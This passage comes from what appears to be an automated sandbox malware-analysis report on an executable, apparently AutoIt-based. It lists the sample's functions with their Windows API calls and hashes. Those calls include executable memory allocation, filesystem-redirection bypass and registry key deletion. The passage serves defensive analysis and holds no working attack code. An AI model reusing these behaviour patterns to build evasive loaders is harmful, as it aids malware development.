                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 4c8a63942192852285e2ad2a6aed858ba16a796c2ee6b712181ecf5daa72e8a7
                                                            • Instruction ID: 4c873745b2cb000cc76ccad30bbb7e030f12d42ca536df9f8f2c7e46416a2b88
                                                            • Opcode Fuzzy Hash: 4c8a63942192852285e2ad2a6aed858ba16a796c2ee6b712181ecf5daa72e8a7
                                                            • Instruction Fuzzy Hash: 1C21A472602228BBDB10DBA8D841DAFB7FDEF54354F14045BE905E7250DB71AD40ABB4
                                                            Function 00D5770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D57772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D57787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D57794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: b87e6eea8a6d813068fe689a199b6ae8b7893156b11758b2bae56c01632c0666
                                                            • Instruction ID: a97a82f721bfc00d3953725c25d08ccb2a28f4cef4be1e5fc79e9d6d715029a0
                                                            • Opcode Fuzzy Hash: b87e6eea8a6d813068fe689a199b6ae8b7893156b11758b2bae56c01632c0666
                                                            • Instruction Fuzzy Hash: C6112372200308BEEF205F60EC05FEB7BA9EF88B65F150129FE41A6190D272E811CB30
                                                            Function 00D56920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00D569A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D569B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: @U=u$edit
                                                            • API String ID: 2978978980-590756393
                                                            • Opcode ID: c3ffc656b4532f77e88b71cbb2eb97bdae8e1d8146eb6584be53d11021024200
                                                            • Instruction ID: 1a25caef5316d8cebdf8f60a99f5f300f81999678252ade2d86e79d4a517dfc7
                                                            • Opcode Fuzzy Hash: c3ffc656b4532f77e88b71cbb2eb97bdae8e1d8146eb6584be53d11021024200
                                                            • Instruction Fuzzy Hash: 74115B71100204ABEF108F64DC40AAB37A9EB053B6F944624FDA5972E0C731DC589F70
                                                            Function 00D28E05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D28E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: 82c8766a068d54255e9ee89273bb03ba546f693837cfc1e4a5abb5a637ed9848
                                                            • Instruction ID: 5ee3a42b928c3c51eace4c63dd225eaabd7a4740553cf6350753f777f9880f72
                                                            • Opcode Fuzzy Hash: 82c8766a068d54255e9ee89273bb03ba546f693837cfc1e4a5abb5a637ed9848
                                                            • Instruction Fuzzy Hash: 7E01B571606229AB8B14EBA4DC558FE7369EF15320B140A1AB871573E1EE329808E670
                                                            Function 00D28CFD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D28D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: ada40b59117f6c423ca025889aa9b6f6f6f6a703e5d6ae13b7a517551216f79e
                                                            • Instruction ID: 116cced4234bdfff768a31ff1f4a172cb8566d167c69dda5ade9ff9d51a7db5f
                                                            • Opcode Fuzzy Hash: ada40b59117f6c423ca025889aa9b6f6f6f6a703e5d6ae13b7a517551216f79e
                                                            • Instruction Fuzzy Hash: E701F271A42119AFCB14EBA4D952EFF73A8DF25300F14001AB942672E1EE219E0CE671
                                                            Function 00D28D82 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D28DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: 0856e43b6b1d41d81499384fe69106634c969e160f2f1c723f7101cc980dc3c7
                                                            • Instruction ID: b3893be9f409933ea5e7adbe58a6d8151bbfe8af38a3a87c9ec6afe132050401
                                                            • Opcode Fuzzy Hash: 0856e43b6b1d41d81499384fe69106634c969e160f2f1c723f7101cc980dc3c7
                                                            • Instruction Fuzzy Hash: 2D01F271A46219ABCB10EBA8D952EFE73A8DF21300F140016B841A3292EE218E0CE271
                                                            Function 00D5ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,00D957B0,00D5D809,000000FC,?,00000000,00000000,?,?,?,00D0B969,?,?,?,?,?), ref: 00D5ACD1
                                                            • GetFocus.USER32 ref: 00D5ACD9
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • SendMessageW.USER32(0140EE90,000000B0,000001BC,000001C0), ref: 00D5AD4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3601265619-2594219639
                                                            • Opcode ID: fdbf940b0399b0de874be9df0f50148cef9a07597de3076aa94c62603d2b3b1a
                                                            • Instruction ID: 82857f0b106141088f5b1f040bded73b53e5c939b2accc5cad5b6558e42de80e
                                                            • Opcode Fuzzy Hash: fdbf940b0399b0de874be9df0f50148cef9a07597de3076aa94c62603d2b3b1a
                                                            • Instruction Fuzzy Hash: 400148312017109FCB15AB28D894A5577E5EB49322B18027AFD15CB3B5E771AC468B61
                                                            Function 00CE6063 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CE603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CE6051
                                                            • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00CE607F
                                                            • GetParent.USER32(?), ref: 00D20D46
                                                            • InvalidateRect.USER32(00000000,?,00CE3A4F,?,00000000,00000001), ref: 00D20D4D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$InvalidateParentRectTimeout
                                                            • String ID: @U=u
                                                            • API String ID: 3648793173-2594219639
                                                            • Opcode ID: b87c4ec63fd855c0beb6f103b8f1596fe459c213df6ae028dc81f53020fcc2a8
                                                            • Instruction ID: 64fa9ee217b03d60c635ee3fcc2a02c7adceda2a26888c6662e1c5fe9983cf25
                                                            • Opcode Fuzzy Hash: b87c4ec63fd855c0beb6f103b8f1596fe459c213df6ae028dc81f53020fcc2a8
                                                            • Instruction Fuzzy Hash: FEF0A0301103A0FBEF201F62DC09F967B99AB61385F245428F9419E1A1C6B26840AB64
                                                            Function 00CD4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4BD0,?,00CD4DEF,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CD4C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: e7037951bfcd86f3b82275a2103d59f0b0e71d9ce9110490209efe7ca61c59fb
                                                            • Instruction ID: 91e32f09114677cb0b053f8a0b3b7f855ba3a9e6b8c750718971e6ebff361c76
                                                            • Opcode Fuzzy Hash: e7037951bfcd86f3b82275a2103d59f0b0e71d9ce9110490209efe7ca61c59fb
                                                            • Instruction Fuzzy Hash: DCD01231511B13CFD7206F71D948A07B6D5EF09352B118C3A9995DA650E7B0D484CB61
                                                            Function 00CD4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4B83,?), ref: 00CD4C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CD4C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 206c9f690399eebff35c9a062eaa2769bf0d55a8befe3bfe5d22702bebe6df83
                                                            • Instruction ID: 9b598bb472e6c18ce046db12ef53e5668b248d50f71e57e30447b94f04b5b8f0
                                                            • Opcode Fuzzy Hash: 206c9f690399eebff35c9a062eaa2769bf0d55a8befe3bfe5d22702bebe6df83
                                                            • Instruction Fuzzy Hash: E2D01271510B13CFD7245F31D908A0677D4AF05352B11883ADAA5DA664E670D484C660
                                                            Function 00D50DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00D51039), ref: 00D50DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D50E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: d5fcffb1dcc8453a35d2869437c166665f7b9f39625d3023a8192ee609b5c626
                                                            • Instruction ID: fb13823a6c30505696480de593f2bab301585ece9e44998f0981893c2860b416
                                                            • Opcode Fuzzy Hash: d5fcffb1dcc8453a35d2869437c166665f7b9f39625d3023a8192ee609b5c626
                                                            • Instruction Fuzzy Hash: FED01271510712CFD7216F75D809656B6D5AF04353F198C7DACC5D6250D7B0D494C770
                                                            Function 00D490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00D48CF4,?,00D5F910), ref: 00D490EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D49100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: ce62def61d6dfe63ef2aa3a15e1014e156bb12e8804d69dc8f371b90b5a1d728
                                                            • Instruction ID: e74b3b770381adac6ecb4163c74a12f4395723a6a00203ce0e86d97a3964c5e0
                                                            • Opcode Fuzzy Hash: ce62def61d6dfe63ef2aa3a15e1014e156bb12e8804d69dc8f371b90b5a1d728
                                                            • Instruction Fuzzy Hash: 57D01235510713CFDB209F31D818907B6D4AF05352B1588399985DA650E670C484C7B0
                                                            Function 00D11714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 246be71a007ea264768bee5f7c572799c12ea3fc581c7b4025f225cf8cbc58f6
                                                            • Instruction ID: 5bdf470df5347ee00dc6e2dbbab0dc7493cd44e4e784edd0e978c0dfdc74c8b2
                                                            • Opcode Fuzzy Hash: 246be71a007ea264768bee5f7c572799c12ea3fc581c7b4025f225cf8cbc58f6
                                                            • Instruction Fuzzy Hash: 80D01279805219FAC7009790A88C8F9737CA708301F140552F742D2280E661C7D4E631
                                                            Function 00D2717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ada95613efffbd0db45d009835c6d8e53c60a7ca85a710ad6492d4d6139fba77
                                                            • Instruction ID: 9875bcbe04769e127aef04aae2fc14425828009a27dec5b24c7cbb424b9d9330
                                                            • Opcode Fuzzy Hash: ada95613efffbd0db45d009835c6d8e53c60a7ca85a710ad6492d4d6139fba77
                                                            • Instruction Fuzzy Hash: 1FC18174A04226EFCB24DF94D884EAEBBB5FF58718B144598E805DB251D730ED41DBA0
                                                            Function 00D4E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D4E0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D4E101
                                                              • Part of subcall function 00D4D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D4D7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00D4E301
                                                            • _memmove.LIBCMT ref: 00D4E314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: cd4b205edce1ddf5dc87478932bd2d919ef1f907f18e1ece72476261b1f76658
                                                            • Instruction ID: c29a8dbe36636becadb0988b87ffa0c06b41c509dfa3a92525321cfed3d612d1
                                                            • Opcode Fuzzy Hash: cd4b205edce1ddf5dc87478932bd2d919ef1f907f18e1ece72476261b1f76658
                                                            • Instruction Fuzzy Hash: 99C16971A083019FC704DF28C480A6ABBE4FF89714F14896EF9999B351D771E946CFA2
                                                            Function 00D48093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D480C3
                                                            • CoUninitialize.OLE32 ref: 00D480CE
                                                              • Part of subcall function 00D2D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2D5D4
                                                            • VariantInit.OLEAUT32(?), ref: 00D480D9
                                                            • VariantClear.OLEAUT32(?), ref: 00D483AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 9b8f7589febc8057b2cb67d5e4e6e15273033a33b4c3c8ab0b29224c7a0da129
                                                            • Instruction ID: f07a0bd7b8873a51d17ef9289e822764c4435af09b394dddc259d9ec5e33e76b
                                                            • Opcode Fuzzy Hash: 9b8f7589febc8057b2cb67d5e4e6e15273033a33b4c3c8ab0b29224c7a0da129
                                                            • Instruction Fuzzy Hash: 1FA159796047019FCB10EF54C885A2EB7E4FF89754F144449FA9A9B3A1CB30EC05EBA6
                                                            Function 00D27530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D276EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D27702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00D5FB80,000000FF,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D27727
                                                            • _memcmp.LIBCMT ref: 00D27748
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
